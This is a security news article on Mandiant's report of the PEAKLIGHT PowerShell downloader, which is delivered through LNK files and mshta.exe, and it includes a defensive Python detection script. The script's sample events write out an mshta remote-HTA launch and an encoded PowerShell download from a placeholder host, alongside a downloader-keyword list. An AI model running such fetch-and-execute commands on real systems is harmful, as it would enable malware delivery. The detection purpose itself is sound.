Cybersecurity researchers have discovered a new type of dropper that acts as a conduit for launching next-stage malware, with the primary aim of infecting Windows systems with information stealers and loaders.
"This memory-only dropper decrypts and executes a PowerShell-based downloader," stated researchers from Google-owned Mandiant. "This PowerShell-based downloader is being tracked as PEAKLIGHT."
The malware strains distributed using this method include Lumma Stealer, Hijack Loader (also known as DOILoader, IDAT Loader, or SHADOWLADDER), and CryptBot. All of these strains are advertised under the malware-as-a-service (MaaS) model.
The attack chain begins with a Windows shortcut (LNK) file, which is delivered through drive-by download techniques. For example, this might occur when users search for a movie on search engines. The LNK files are often distributed within ZIP archives disguised as pirated movies to trick users into downloading them.
Upon activation, the LNK file connects to a content delivery network (CDN) hosting an obfuscated memory-only JavaScript dropper. This dropper executes the PEAKLIGHT PowerShell downloader script on the host machine. The downloader then contacts a command-and-control (C2) server to obtain additional malicious payloads.
Mandiant's analysis uncovered multiple variations of these LNK files. Some variations use asterisks (*) as wildcards to execute the legitimate mshta.exe binary, allowing the dropper to run malicious code retrieved from a remote server discreetly.
Similarly, the droppers have been found to embed both hex-encoded and Base64-encoded PowerShell payloads. These payloads are eventually unpacked to execute PEAKLIGHT, which is engineered to deliver subsequent malware on a compromised system. To further obscure its activities, PEAKLIGHT may also download a legitimate movie trailer, serving as a distraction for the user.
"PEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain," explained Mandiant researchers Aaron Lee and Praveeth D'Souza. "It checks for the presence of ZIP archives in hard-coded file paths. If the archives do not exist, the downloader will connect to a CDN site, download the remotely hosted archive file, and save it to disk."
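Detection logic for the chain described above (Explorer launching mshta.exe against a remote URL, then PowerShell carrying a hex- or Base64-encoded payload), added here as an example and not code from Mandiant or this article. It runs over constructed process-creation events; the hostnames, paths and the DOWNLOADER_HINTS keyword list are assumptions, and a real deployment would feed it Sysmon or EDR events instead.

```python
import base64
import re

# Keywords in decoded PowerShell that point to a downloader stage (assumed list)
DOWNLOADER_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient", "expand-archive")
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob (UTF-16LE script)
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Long hex runs, the other payload encoding the droppers were seen using
HEX_RE = re.compile(r"(?<![0-9A-Fa-f])([0-9A-Fa-f]{40,})(?![0-9A-Fa-f])")

def decode_payloads(cmdline):
    """Decode Base64 (-EncodedCommand) and hex-encoded blobs found in a command line."""
    decoded = []
    for b64 in ENC_RE.findall(cmdline):
        try:
            decoded.append(base64.b64decode(b64).decode("utf-16-le", "ignore"))
        except ValueError:
            pass  # not valid Base64, skip it
    decoded += [bytes.fromhex(h).decode("utf-8", "ignore") for h in HEX_RE.findall(cmdline) if len(h) % 2 == 0]
    return decoded

def classify(parent, image, cmdline):
    """Return finding strings for one process-creation event (parent image name, image path, command line)."""
    findings, exe, parent = [], image.rsplit("\\", 1)[-1].lower(), parent.lower()
    if exe == "mshta.exe" and URL_RE.search(cmdline):
        findings.append("mshta.exe executing a remote URL" + (" from Explorer (LNK-style launch)" if parent == "explorer.exe" else ""))
    if exe == "powershell.exe":
        if parent == "mshta.exe":
            findings.append("PowerShell spawned by mshta.exe")
        for text in decode_payloads(cmdline):
            hits = [h for h in DOWNLOADER_HINTS if h in text.lower()]
            findings.append("encoded PowerShell" + (" with downloader keywords: " + ", ".join(hits) if hits else " (no downloader keyword)"))
    return findings

def scan(events):
    """Run classify() over (parent, image, cmdline) tuples; return {index: findings} for hits only."""
    return {i: f for i, (p, im, c) in enumerate(events) if (f := classify(p, im, c))}

# Constructed sample events (not from the article); hostnames and paths are placeholders
_STAGE2 = "Invoke-WebRequest https://cdn.example.invalid/trailer.zip -OutFile $env:TEMP\\t.zip"
SAMPLE_EVENTS = [
    ("explorer.exe", r"C:\Windows\System32\mshta.exe", "mshta.exe https://cdn.example.invalid/l.hta"),
    ("mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -enc " + base64.b64encode(_STAGE2.encode("utf-16-le")).decode()),
    ("cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -Command " + _STAGE2.encode().hex()),  # hex-encoded variant, ordinary parent
    ("explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),  # benign
]
```

Call `scan(SAMPLE_EVENTS)` to get the three suspicious events keyed by index; the benign notepad.exe event produces no finding.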
This revelation comes on the heels of Malwarebytes detailing a separate malvertising campaign. In this campaign, attackers used fraudulent Google Search ads for Slack, the enterprise communications platform, to redirect users to counterfeit websites. These sites hosted malicious installers that ultimately led to the deployment of a remote access trojan named SectopRAT.
These findings highlight the ongoing evolution of malware distribution tactics, with cybercriminals continually devising new methods to exploit users and evade detection. The use of memory-only droppers, combined with the obfuscation of payloads and the exploitation of legitimate-looking downloads, underscores the need for vigilance and advanced cybersecurity measures to detect and thwart these sophisticated attacks.